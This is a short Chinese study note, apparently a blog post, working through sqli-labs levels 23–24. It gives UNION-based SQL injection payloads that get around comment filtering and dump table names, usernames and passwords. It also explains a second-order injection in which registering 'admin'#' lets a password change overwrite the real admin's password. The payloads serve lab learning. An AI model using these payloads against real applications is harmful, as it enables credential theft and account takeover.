继续学习sqli-labs
本篇是less 23-24
?id=1'
然后尝试#
、--+
等注释
都无用
看了眼源码
注释都被替换掉了
尝试闭合
?id=-1' union select 1, 2, 3 '
?id=-1' union select 1, database(), 3 '
?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3'
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3'
?id=-1' union select 1,(select group_concat(username) from users),(select group_concat(password) from users)'
完成注入
注册
user:admin'#
passwd:123
然后再登录时发现
admin'#
的密码仍然是123
admin
的密码被改为123456
这是因为改密码时
sql语句变成
$sql = "UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='$curr_pass' ";
也就是说
执行了
UPDATE users SET passwd="New_Pass" WHERE username ='admin'
即把admin
的数据update了
本题的意义在于展示如何利用改密码的漏洞
进行二次注入
修改原来就存在的用户的密码
学习了新知识